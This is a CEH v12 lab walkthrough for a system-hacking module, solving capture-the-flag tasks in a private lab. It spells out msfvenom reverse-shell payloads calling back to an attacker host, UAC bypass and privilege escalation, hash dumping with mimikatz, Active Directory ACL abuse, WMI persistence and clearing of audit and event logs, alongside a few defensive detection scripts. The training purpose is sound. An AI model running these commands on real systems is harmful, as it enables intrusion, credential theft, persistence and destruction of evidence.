# Module 06 - Practical

These are the steps that I took to complete the flag-hunting session in the current module of the CEH v12 Practical Course.

### Flag 1

Run the Responder tool on the Ubuntu machine and find the NTLM hash for the user Jason on Windows 11. Simulate the user Jason (user: Jason and password: qwerty) on the Windows 11 machine. Enter the option that specifies the interface while running the Responder tool.

<figure><img src="/files/sG2EVwtXEVZVhJPruFnR" alt=""><figcaption></figcaption></figure>

A:           -I

### Flag 2

Run L0phtCrack on the Windows 11 machine. You have the admin credentials (username: Administrator, password: Pa$$w0rd) of a target machine, which is at 10.10.1.22. Find the password of another user, Martin, on the machine at 10.10.1.22.

Launch L0phtCrack and follow these steps: Windows > A remote Machine > {Host: 10.10.1.22} {Username: Administrator} {Password: Pa$$w0rd} > Thorough Password Audit > Generate Report {CSV} > Run this job Immediately

<figure><img src="/files/uKDT1hNCvEmAPYgpiMi6" alt=""><figcaption></figcaption></figure>

A:               apple

### Flag 3

Search for the vulnerability "CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)" on exploit-db.com. What is the CVE ID for this vulnerability?

* Browser:       exploit-db.com
* Browser:       Search for > CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)

<figure><img src="/files/n3ad0ONSTKJ4beh1K8dk" alt=""><figcaption><p>exploit-db.com</p></figcaption></figure>

<figure><img src="/files/b9PIWzHQvrGBFV7sbT9x" alt=""><figcaption></figcaption></figure>

A:               2018-6892

### Flag 4

For this task, use the Parrot Security machine (10.10.1.13) as the attacker’s system and the Windows 11 machine (10.10.1.11) as the target system. Run the Armitage tool from the attacker’s machine to exploit vulnerabilities on the target system. Interact with the target system and use the sysinfo command to find the build number of the target’s operating system.

{% code title="Parrot Terminal" %}

```bash
service postgresql start
```

{% endcode %}

You have to start the database for Armitage to work.

* Execute Application > Pentesting > Exploitation Tools > Metasploit Framework > Armitage

<figure><img src="/files/ABJzAEJq2BWcI0BAQTrT" alt=""><figcaption></figcaption></figure>

Metasploit Server information, to use it too

{% code title="Armitage" %}

```bash
Select meterpreter_reverse_tcp
```

{% endcode %}

Add the following information to send the exploit.

<figure><img src="/files/Yr1sDrlbJG5PXe6ylQQP" alt=""><figcaption></figcaption></figure>

* Open the target machine and execute the exploit

<img src="/files/mJplEARhuSHFDVmJmyI4" alt="" data-size="original">

* Armitage:     Open the shell and execute sysinfo

<figure><img src="/files/HZ9qchdW4sxbecCEhlmG" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/bdvr1Nfntfhc2FZ42Hp3" alt=""><figcaption><p>At OS: you can find the answer</p></figcaption></figure>

A:                    22000

### Flag 5

Use the Ninja Jonin to gain access to the Windows Server 2022. Enter the name of the Windows Server machine that is captured in the Jonin console.

In the free trial version of Ninja\&Jonin, you have to change the HOST in constants.json.

<figure><img src="/files/1TlR9JHe6pPc5R0ptsYX" alt=""><figcaption></figcaption></figure>

* Open Jonin.win.exe on the attacker machine

![](/files/0q1cO6To6ofcq4FFCItj)

* Open Ninja.win.exe on the target

![](/files/uPnpXHrWUgE1bpFKxZ3w)

* Now, in the attacker terminal, type List

<figure><img src="/files/MfbKFV5TpT6a1IuC5zcw" alt=""><figcaption></figcaption></figure>

This tool is excessively manual, so there is usually no point in using it.

A:                    Server22

### Flag 6

Use the Ninja Jonin to gain access to the Windows Server 2022. Enter the command that should be used to open shell on the target machine, using Jonin console.

<figure><img src="/files/2ZHAnS92Th3ABB7k8eNV" alt=""><figcaption></figcaption></figure>

The image is from the documentation; the command that you need to execute after connect 1 is cmd.

A:                    cmd

### Flag 7

For this task, use the Parrot Security machine (10.10.1.13) as the attacker’s system and the Windows 11 machine (10.10.1.11) as the target system. Execute and exploit a vulnerable application, D:\CEH-Tools\CEHv11 Module 06 System Hacking\Buffer Overflow Tools\vulnserver\vulnserver.exe, to gain admin access to the target machine. Flag submission is not required for this task, enter "No flag" as the answer.

For this task, you must follow the steps from Lab 1: Task 7; there are 150 steps in this task.

A:                    No flag

### Flag 8

For this task, use the Parrot Security machine (10.10.1.13) as the attacker’s system and the Windows 11 machine (10.10.1.11) as the target system. Use the msfvenom tool on the attacker’s machine to exploit the target machine and gain SYSTEM-level access. Obtain the password hashes of the users on the target machine 10.10.1.11. Flag submission is not required for this task, enter "No flag" as the answer.

Using your Parrot Machine as root,

{% code title="Parrot Terminal" %}

```bash
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.1.13 -f exe > /home/attacker/Desktop/Exploit.exe
```

{% endcode %}

Create a sharing folder and copy the exploit there.

{% code title="Parrot Terminal" %}

```bash
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /home/attacker/Desktop/Exploit.exe /var/www/html/share/
```

{% endcode %}

Now open the MSFconsole and change the variables.

{% code title="Parrot Terminal" %}

```bash
msfconsole
use exploit/multi/handler            # generic listener for the generated payload
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13
exploit -j -z
```

{% endcode %}

Open the Windows machine, log in, and with your browser go to "<http://10.10.1.13/share>" and download the file "Exploit.exe"; don’t forget to execute it. \[Remember to use **service apache2 start** to share the file from Parrot to Windows]

Now return to your Parrot machine; it has detected a session, and now you want to activate it.

<figure><img src="/files/83ZxY7qHqRaUK7xLNKwq" alt=""><figcaption></figcaption></figure>

{% code title="Meterpreter" %}

```bash
sessions -i 1
getuid
```

{% endcode %}

<figure><img src="/files/ifdolbvv3w0jT8D9Bdf7" alt=""><figcaption><p>That's you right now, but with user privileges</p></figcaption></figure>

Here, we are going to use a tool provided by EC-Council. On your Parrot machine, copy BeRoot to your desktop (location: CEHv12 Module 06 System Hacking\Privilege Escalation Tools; first you have to go to smb://10.10.1.11 using the Windows credentials).

{% code title="Meterpreter" %}

```bash
upload /home/attacker/Desktop/BeRoot/beRoot.exe
shell
```

{% endcode %}

<figure><img src="/files/BpflVPrAACeZsLkvVNyM" alt=""><figcaption><p>Perfect, now we are using the shell from windows to execute beRoot</p></figcaption></figure>

{% code title="Meterpreter" %}

```bash
beRoot.exe
exit
```

{% endcode %}

Now we will go further with another tool.

{% code title="Meterpreter" %}

```bash
use exploit/windows/local/bypassuac_fodhelper
show options
set SESSION 1
set payload windows/meterpreter/reverse_tcp
show options               # To check the information
set LHOST 10.10.1.13
set TARGET 0
exploit
getsystem -t 1
getuid # Check more information
run post/windows/gather/smart_hashdump
```

{% endcode %}

![](/files/vu9ODyfz39LzUoCHyiBs)

<figure><img src="/files/mJNDb7ge0RSaffcEFTuk" alt=""><figcaption><p>Password hashes from <strong>run post/windows/gather/smart_hashdump</strong></p></figcaption></figure>

A:        No flag

### Flag 9

For this task, use the Parrot Security machine (10.10.1.13) as the attacker’s system and the Windows 11 machine (10.10.1.11) as the target system. Use the msfvenom tool on the attacker’s machine to create a backdoor and exploit the target machine to gain an MSF interactive shell. Find the number of interfaces on the target machine.

Same steps as before, and the same exploit (this time called Backdoor.exe), but at the first msfconsole you use " **set payload windows/meterpreter/reverse\_tcp** " and you use the command **ipconfig** at the end.

<figure><img src="/files/PqnL5kXn7P6HgY5zCKCP" alt=""><figcaption></figcaption></figure>

![](/files/C8xfeHOujFSReEYKa0No)

A:        2

### Flag 10

Use a proof-of-concept code to execute the attack on the Parrot Security machine and escalate the privileges from a standard user to a root user. Flag submission is not required for this task, enter "No flag" as the answer.

Here, we are going to use a specific exploit, pkexec CVE-2021-4034.

{% code title="Parrot Terminal" %}

```bash
mkdir /tmp/pwnkit
cd /tmp/pwnkit/CVE-2021-4034
make
./cve-2021-4034
```

{% endcode %}

![](/files/dYCThkH4VZMjI6k7BlqB)

{% code title="Parrot Terminal" %}

```bash
./cve-2021-4034
```

{% endcode %}

![](/files/DtVZpJqelDSsJ9Bw2E7S)

And done, you exploited yourself. Jokes aside, it is a good tool if you manage to execute the exploit as a user inside a Linux machine.

A:        No Flag

### Flag 11

Exploit misconfigured NFS to gain access and to escalate privileges on Ubuntu machine. Enter the command that was used to check if any share is available for mount in Ubuntu machine.

This is a question from Lab 2, Task 4. After discovering port 2049 (nfs\_acl) with Nmap, install the client tools with sudo apt-get install nfs-common. Then you prepare a linked folder for later use.

![](/files/g1rp2xdVoLte0dwz87K7)

A:        showmount -e 10.10.1.9

### Flag 12

Exploit misconfigured NFS to gain access and to escalate privileges on Ubuntu machine. What is the command that is used to view current processes along with their PIDs?

This is a question from Lab 2, Task 4. It is extremely important to know about this; it will help you a lot to solve machines.

A:        ps -ef

### Flag 13

Exploit Sticky keys feature to gain access and to escalate privileges on the Windows 11 machine. Enter the domain of Windows 11 obtained from sysinfo command in meterpreter session.

The setup is the same as in the previous Meterpreter exploits. Since we are going to use Meterpreter a lot from here on, I will create a block for "Classic Meterpreter".

\------ START OF CLASSIC METERPRETER -----

{% code title="Parrot Terminal" %}

```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=444 -f exe > /home/attacker/Desktop/Exploit.exe
```

{% endcode %}

Create a sharing folder and copy the exploit there.

{% code title="Parrot Terminal" %}

```bash
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /home/attacker/Desktop/Exploit.exe /var/www/html/share/
service apache2 start
```

{% endcode %}

Now open the MSFconsole and change the variables.

{% code title="Parrot Terminal" %}

```bash
msfconsole
use exploit/multi/handler            # generic listener for the generated payload
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13
set LPORT 444
run
```

{% endcode %}

Open the Windows machine, log in, and with your browser go to "<http://10.10.1.13/share>" and download the file "Exploit.exe"; don’t forget to execute it. \[Remember to use service apache2 start to share the file from Parrot to Windows]

\------ END OF CLASSIC METERPRETER -----

{% code title="Meterpreter" %}

```bash
sysinfo
```

{% endcode %}

<figure><img src="/files/fap7oRCIGSrE6sVjD8fX" alt=""><figcaption></figcaption></figure>

A:        WORKGROUP

### Flag 14

Use Metasploit inbuilt Mimikatz module which is also known as kiwi to dump Hashes from Windows 11 machine. Enter the command that is used to open mimikatz in meterpreter session.

Follow the steps from **Classic Meterpreter - Flag 13**, then:

{% code title="Meterpreter" %}

```bash
use exploit/windows/local/bypassuac_fodhelper
set session 1
```

{% endcode %}

Check which variables need to be filled in with show options, for example set TARGET 0.

{% code title="Meterpreter" %}

```bash
exploit
getsystem -t 1
load kiwi
```

{% endcode %}

A:        load kiwi

### Flag 15

Use the Power Spy tool on the Windows Server 2022 machine to monitor the target machine at 10.10.1.19. Use the user account Jason, with the password qwerty, to establish a Remote Desktop Connection with the target system. What is the default key combination to put Power Spy in the Stealth mode?

From the LAB 3 – TASK 1, at the step 33.

I don’t like this tool, so if someone wants to add steps here, it is open: send me an email and I will add the information here. (Remember to add your webpage or LinkedIn so I can give proper credit.)

![](/files/SKjck0YIGi6WMu2ai61z)

A:        Ctrl+Alt+X

### Flag 16

Use the Spytech SpyAgent tool on the Windows Server 2022 machine to monitor the target machine at 10.10.1.19. Use the user account Jason, with the password qwerty, to establish a Remote Desktop Connection with the target system. Which option will enable you to configure SpyTech Spy Agent to run in the total stealth mode, with all possible logging options preconfigured?

From the LAB 3 – TASK 2, at the step 23.

I don’t like this tool.

![](/files/w8zMr8qCHiRttIQZumAB)

A:        Complete + Stealth Configuration

### Flag 17

In the Windows Server 2019 machine, use NTFS Streams to hide calc.exe inside the readme.txt file. Flag submission is not required for this task, enter "No flag" as the answer.

Using your Windows machine, log in and go to the folder C:\magic, copy the file C:\Windows\System32\calc.exe into it, and create a file called readme.txt with any content.

{% code title="Windows Terminal" %}

```bash
cd C:\magic
```

{% endcode %}

<figure><img src="/files/jHCrKPl7f2XEDExcKcEi" alt=""><figcaption></figcaption></figure>

{% code title="Windows Terminal" %}

```bash
type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe
mklink backdoor.exe readme.txt:calc.exe
```

{% endcode %}

A:        No flag
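To find a stream hidden this way, list the folder with `dir /r` and look for `:$DATA` entries. The parser below is an added example, not part of the original walkthrough: it flags non-standard alternate data streams and symlinks that point into a stream. The sample listing is constructed, and the size threshold and extension list are assumptions.

```python
import re

# Constructed `dir /r` output for the C:\magic folder (not captured from the lab).
SAMPLE_DIR_R = r"""
 Directory of C:\magic

05/01/2024  10:12 AM    <DIR>          .
05/01/2024  10:12 AM    <DIR>          ..
05/01/2024  10:12 AM    <SYMLINK>      backdoor.exe [readme.txt:calc.exe]
05/01/2024  10:10 AM            27,648 calc.exe
05/01/2024  10:11 AM                14 readme.txt
                                27,648 readme.txt:calc.exe:$DATA
05/01/2024  10:09 AM             1,024 notes.pdf
                                    26 notes.pdf:Zone.Identifier:$DATA
"""

# Stream lines carry no date column: "<size> <file>:<stream>:$DATA".
STREAM_RE = re.compile(r"^\s+([\d.,]+)\s+(.+?):([^:]+):\$DATA\s*$")
# File symlinks are listed as "<SYMLINK> name [target]".
LINK_RE = re.compile(r"<SYMLINK>\s+(\S+)\s+\[([^\]]+)\]")

BENIGN_STREAMS = {"zone.identifier"}  # mark-of-the-web written on download
EXEC_EXTENSIONS = (".exe", ".dll", ".scr", ".bat", ".cmd", ".ps1", ".vbs", ".js")
SIZE_THRESHOLD = 4096                 # assumed triage threshold, in bytes


def find_streams(listing):
    """Return every alternate data stream that is not a known benign one."""
    findings = []
    for line in listing.splitlines():
        m = STREAM_RE.match(line)
        if not m:
            continue
        size = int(re.sub(r"\D", "", m.group(1)))  # drop thousands separators
        host, stream = m.group(2), m.group(3)
        if stream.lower() in BENIGN_STREAMS:
            continue
        reasons = []
        if stream.lower().endswith(EXEC_EXTENSIONS):
            reasons.append("executable extension")
        if size > SIZE_THRESHOLD:
            reasons.append("large stream")
        findings.append({"host": host, "stream": stream,
                         "size": size, "reasons": reasons})
    return findings


def find_stream_links(listing):
    """Return (link, target) pairs whose target names a stream, not a file."""
    links = []
    for line in listing.splitlines():
        m = LINK_RE.search(line)
        if not m:
            continue
        # Ignore the colon of a drive letter such as C:\ in absolute targets.
        target_path = re.sub(r"^[A-Za-z]:\\", "", m.group(2))
        if ":" in target_path:
            links.append((m.group(1), m.group(2)))
    return links


if __name__ == "__main__":
    for f in find_streams(SAMPLE_DIR_R):
        print(f"ADS {f['host']}:{f['stream']} ({f['size']} bytes) {f['reasons']}")
    for link, target in find_stream_links(SAMPLE_DIR_R):
        print(f"symlink {link} -> {target}")
```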

### Flag 18

On the Windows 11 machine, hide data into a text file using the whitespace steganography tool Snow. Flag submission is not required for this task, enter "No flag" as the answer.

Using your Windows machine, log in, go to the folder "E:\CEH-Tools\CEHv12 Module 06 System Hacking\Steganography Tools\Whitespace Steganography Tools" and copy the folder "Snow" to the Desktop. Then create a readme.txt with anything inside.

{% code title="Windows Terminal" %}

```bash
cd C:\Users\Admin\Desktop\Snow
snow -C -m "Real Sensitive Information" -p "magic" readme.txt readme2.txt
```

{% endcode %}

And done: readme.txt is now encrypted as readme2.txt. It shows the original content from readme.txt and hides the sensitive information. To see the hidden content, type: snow -C -p "magic" readme2.txt

A:        No flag
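Whitespace steganography of this kind leaves its data in trailing spaces and tabs, which ordinary text rarely has. The check below is an added example, not part of the original walkthrough: it reports trailing-whitespace runs and strips them. The sample texts are constructed (they imitate a carrier file and are not real Snow output), and the 20% ratio is an assumed threshold.

```python
# Constructed samples: STEGO imitates a carrier with data appended as
# trailing spaces and tabs; it is not real Snow output.
CLEAN = "Meeting notes\nBudget approved.\nNext review in May.\n"
STEGO = ("Meeting notes" + " \t   \t  \t" + "\n"
         "Budget approved." + "\t \t     \t" + "\n"
         "Next review in May.\n")


def trailing_runs(text):
    """Return (line_number, run) for every line ending in spaces or tabs."""
    runs = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        run = line[len(line.rstrip(" \t")):]
        if run:
            runs.append((lineno, run))
    return runs


def assess(text, min_ratio=0.2):
    """Summarise trailing whitespace and decide whether it looks deliberate."""
    lines = text.splitlines()
    runs = trailing_runs(text)
    tab_lines = [n for n, run in runs if "\t" in run]
    long_runs = [n for n, run in runs if len(run) >= 2]
    ratio = len(long_runs) / len(lines) if lines else 0.0
    return {
        "lines_with_trailing": [n for n, _ in runs],
        "lines_with_tabs": tab_lines,
        "hidden_chars": sum(len(run) for _, run in runs),
        # A trailing tab is rare in hand-written text; so are many long runs.
        "suspicious": bool(tab_lines) or ratio >= min_ratio,
    }


def sanitize(text):
    """Strip trailing spaces and tabs (line endings are normalised to LF)."""
    body = "\n".join(line.rstrip(" \t") for line in text.splitlines())
    return body + ("\n" if text.endswith(("\n", "\r")) else "")


if __name__ == "__main__":
    print(assess(STEGO))
    print(assess(CLEAN))
    print(sanitize(STEGO) == CLEAN)
```

Running `sanitize` over text files before they leave a controlled environment destroys any payload carried this way, at the cost of also removing harmless trailing whitespace.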

### Flag 19

On the Windows Server 2019 machine, hide text inside an image using the OpenStego tool. Flag submission is not required for this task, enter "No flag" as the answer.

* Using the Windows Machine, execute OpenStego

![](/files/SNGBFn9yCAXR2tsUhE5z)

* At Message File, add a file with any message.
* At Cover File, upload any image
* At Output, add a path and the result name

<figure><img src="/files/RLnZTXoBkqeHZR9dq4lr" alt=""><figcaption></figcaption></figure>

A:        No Flag

### Flag 20

Exploit a misconfigured startup folder to gain privileged access and persistence on the Windows 11 machine. What is the command used in this task to elevate privileges?

This task is about using Metasploit + GhostPack Seatbelt, from Module 06, Lab 2, Task 1.

A:        getsystem -t 1

### Flag 21

Exploit Active Directory objects and add Martin, a standard user in Windows Server 2022, to the Domain Admins group through AdminSDHolder. Enter the name of the user that is added into the Domain Admins group in this task.

Using your parrot machine, create a malicious file with msfvenom

\------ START OF CLASSIC METERPRETER -----

{% code title="Parrot Terminal" %}

```bash
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Exploit.exe
```

{% endcode %}

Create a sharing folder and copy the exploit there.

{% code title="Parrot Terminal" %}

```bash
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /home/attacker/Desktop/Exploit.exe /var/www/html/share/
service apache2 start
```

{% endcode %}

Now open the MSFconsole and change the variables.

{% code title="Meterpreter" %}

```bash
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13
set LPORT 444
run
```

{% endcode %}

Open the Windows machine, log in, and with your browser go to "<http://10.10.1.13/share>" and download the file "Exploit.exe"; don’t forget to execute it. \[Remember to use service apache2 start to share the file from Parrot to Windows]

\------ END OF CLASSIC METERPRETER -----

{% code title="Meterpreter" %}

```bash
getuid # Check information
upload -r /home/attacker/PowerTools-master C:\\Users\\Administrator\\Downloads
shell
cd C:\Windows\System32
powershell
```

{% endcode %}

With PowerShell running, we can do whatever we want; in this case, add Martin with permissions.

{% code title="Meterpreter" %}

```bash
cd C:\Users\Administrator\Downloads\PowerView
Import-Module ./powerview.psm1
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName Martin -Verbose -Rights All
Get-ObjectAcl -SamAccountName "Martin" -ResolveGUIDs
```

{% endcode %}

In this case, he just has GenericAll.

A:        Martin

### Flag 22

Exploit WMI event subscription to gain persistent access to the Windows 11 machine. Enter the server username that is acquired after exploiting the WMI event subscription.

Using your parrot machine, create 2 malicious files by using Metasploit.

\------ START OF CLASSIC METERPRETER -----

{% code title="Parrot Terminal" %}

```bash
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Payload.exe
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/wmi.exe
```

{% endcode %}

Create a sharing folder and copy the exploit there.

{% code title="Parrot Terminal" %}

```bash
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp /home/attacker/Desktop/Payload.exe /var/www/html/share/
cp /home/attacker/Desktop/wmi.exe /var/www/html/share/
service apache2 start
```

{% endcode %}

Now open the MSFconsole and change the variables.

{% code title="Meterpreter" %}

```bash
msfconsole
use exploit/multi/handler            # generic listener for the generated payload
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13
set LPORT 444
run
```

{% endcode %}

Open the Windows machine, log in, and with your browser go to "<http://10.10.1.13/share>" and download the file "Exploit.exe"; don’t forget to execute it. \[Remember to use service apache2 start to share the file from Parrot to Windows]

\------ END OF CLASSIC METERPRETER -----

{% code title="Meterpreter" %}

```bash
getuid
upload -r /home/attacker/Wmi-Persistence-master C:\\Users\\Administrator\\Downloads
load powershell
Import-Module ./WMI-Persistence.ps1
Install-Persistence -Trigger Startup -Payload "C:\Users\Administrator\Downloads\wmi.exe"
```

{% endcode %}

Now open a new Parrot Terminal

{% code title="Parrot Terminal" %}

```bash
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.1.13
set LPORT 444
exploit
```

{% endcode %}

From the last command, you get the answer.

A:        NT AUTHORITY\SYSTEM

### Flag 23

From the Parrot Security machine, navigate to CEHv12 Module 06 System Hacking\Covering Tracks Tools\Covert\_TCP on the machine at 10.10.1.11 and copy the file covert\_tcp.c. Compile the code in covert\_tcp.c to create a covert TCP channel between the Parrot Security machine (10.10.1.13) and the Ubuntu machine at 10.10.1.9. For the Windows 11 machine, the username is Admin, and the password is Pa$$w0rd. Flag submission is not required for this task, enter "No flag" as the answer.

This program is used to send a message through TCP; you can read it by using Wireshark. I don’t find this useful.

A:        No flag

### Flag 24

On the Windows 11 machine, use Auditpol to enable or disable security auditing on local or remote systems and to adjust the audit criteria for different categories of security events. Which command is used to clear the audit policies?

Auditpol.exe is the command-line utility tool to change the Audit Security settings at the category and sub-category levels. You can use Auditpol to enable or disable security auditing on local or remote systems and to adjust the audit criteria for different categories of security events.

In the second module, lab 4, task 1, they use auditpol /clear /y to clear the audit policies

A:        auditpol /clear /y

### Flag 25

In the Windows 11 machine, use various Windows utilities such as Clear\_Event\_Viewer\_Logs.bat, wevtutil, and Cipher to clear system logs. Which wevtutil command will clear all system logs (enter the complete command as the answer)?

The system log file contains events that are logged by the OS components. These events are often predetermined by the OS itself. System log files may contain information about device changes, device drivers, system changes, events, operations, and other changes.

There are various Windows utilities that can be used to clear system logs such as Clear\_Event\_Viewer\_Logs.bat, wevtutil, and Cipher. Here, we will use these utilities to clear the Windows machine logs.

This is a theoretical question from Module 06, Lab 4, Task 2 about the command used on the Windows machine to clear the system log.

A:        wevtutil cl system
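Both `auditpol /clear` and `wevtutil cl` leave records of their own, which is what a defender alerts on. The triage below is an added example, not part of the original walkthrough: it matches the two command lines from Flags 24 and 25 in process-creation events and the Windows event IDs written when audit policy changes or a log is cleared. The event records are constructed and their field names are assumptions.

```python
import re

# Constructed records; the dict field names are assumptions of this example
# (map them from your SIEM or from exported event XML).
SYSMON = "Microsoft-Windows-Sysmon/Operational"
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:01", "channel": "Security", "id": 4688,
     "user": "Admin", "cmdline": "auditpol /clear /y"},
    {"time": "2024-05-01T10:00:02", "channel": "Security", "id": 4719,
     "user": "Admin"},
    {"time": "2024-05-01T10:01:10", "channel": SYSMON, "id": 1,
     "user": "Admin", "cmdline": "notepad.exe C:\\magic\\readme.txt"},
    # After the policy is cleared, 4688 stops; Sysmon still sees the process.
    {"time": "2024-05-01T10:02:30", "channel": SYSMON, "id": 1,
     "user": "Admin", "cmdline": "wevtutil cl system"},
    {"time": "2024-05-01T10:02:31", "channel": "System", "id": 104,
     "user": "Admin"},
    {"time": "2024-05-01T10:03:00", "channel": "Security", "id": 1102,
     "user": "Admin"},
]

# Events Windows writes itself when the action happens.
ID_RULES = {
    ("Security", 4719): "system audit policy changed",
    ("System", 104): "event log cleared",
    ("Security", 1102): "security audit log cleared",
}
# Process-creation sources: Security 4688 and Sysmon event 1.
PROCESS_EVENTS = {("Security", 4688), (SYSMON, 1)}
CMD_RULES = [
    (re.compile(r'\bauditpol(?:\.exe)?"?\s+/clear\b', re.I),
     "auditpol /clear executed"),
    (re.compile(r'\bwevtutil(?:\.exe)?"?\s+(?:cl|clear-log)\s+\S+', re.I),
     "wevtutil log clear executed"),
]
POLICY_RULES = {"auditpol /clear executed", "system audit policy changed"}


def detect(events):
    """Return (time, user, rule) for every event that matches a rule."""
    alerts = []
    for ev in events:
        key = (ev.get("channel"), ev.get("id"))
        if key in ID_RULES:
            alerts.append((ev["time"], ev.get("user"), ID_RULES[key]))
        if key in PROCESS_EVENTS:
            for pattern, rule in CMD_RULES:
                if pattern.search(ev.get("cmdline", "")):
                    alerts.append((ev["time"], ev.get("user"), rule))
    return alerts


def tampering_users(alerts):
    """Users who both changed audit policy and cleared a log."""
    policy = {user for _, user, rule in alerts if rule in POLICY_RULES}
    cleared = {user for _, user, rule in alerts if rule not in POLICY_RULES}
    return sorted(policy & cleared)


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(*alert, sep="  ")
    print("audit policy and log tampering by:", tampering_users(detect(SAMPLE_EVENTS)))
```

Event 4688 only carries a command line when command-line auditing for process creation is enabled, so the ID-based rules (4719, 104, 1102) are the ones to rely on if it is not.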


### Flag 26

In the Parrot Security machine, clear the Linux machine event logs using the Bash shell. Which command will disable the Bash shell from saving the history?

The same as the previous question, but with Linux. Here it is a lot easier to complete the task: you can configure the history size to remove every saved command and discard any further ones.

You can use history -c to check.

A:        export HISTSIZE=0


### Flag 27

Use various commands to hide file in Windows and Linux machines. Enter the name of the user that is added in Windows 11 machine in this task.

Here they use many generic commands; it is not worth learning about them.

In Windows, you hide a folder by changing the attributes.

{% code title="Windows Terminal" %}

```bat
attrib +h +s +r Test
REM To remove
attrib -h -s -r Test

REM You can do something similar with net users.
net user Test /active:yes
REM To remove
net user Test /active:no
```

{% endcode %}

A:        Test

### Flag 28

Use various commands to hide file in Windows and Linux machines. Enter the name of the text file that is hidden in Parrot Security machine in this task.

Just add a dot at the beginning of the file.

{% code title="Parrot Terminal" %}

```bash
touch .Secret.txt
```

{% endcode %}

A:        Secret.txt

### Flag 29

In the Windows 11 machine, use the CCleaner tool located at E:\CEH-Tools\CEHv12 Module 06 System Hacking\Covering Tracks Tools\CCleaner to remove unused files and traces of Internet browsing details. Flag submission is not required for this task, enter "No flag" as the answer.

Ok, this is just executing CCleaner, there is no mystery here.

A:        No flag


